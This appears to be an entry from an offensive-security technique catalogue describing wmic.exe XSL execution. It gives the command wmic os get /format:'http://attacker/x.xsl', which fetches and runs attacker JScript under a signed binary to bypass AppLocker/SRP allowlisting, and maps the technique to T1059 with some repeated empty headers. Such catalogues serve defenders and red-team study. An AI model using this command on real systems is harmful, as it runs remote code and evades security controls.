LOL-WMICExecution

wmic.exe XSL Execution

wmic os get /format:'http://attacker/x.xsl' — proxied execution of an attacker-supplied XSL.

§ Where this technique fits

LOL-WMIC is catalogued under the Execution tactic of the offensive-security kill-chain. It appears in 1 approved dossier in the registry, typically at step 2 on average.

§ Dossiers chaining this technique

wmic + XSL → AppLocker / SRP bypass
wmic os get /format:'http://attacker/x.xsl' renders the result by fetching attacker XSL. The XSL contains JScript blocks — runs in wmic's signed-binary context, bypasses allowlisting.
step 2 / 4

§ What commonly comes next

01
Command and Scripting Interpreter
T1059 · Execution
seen 1×

§ Where this technique fits

§ Dossiers chaining this technique

wmic + XSL → AppLocker / SRP bypass

§ What commonly comes next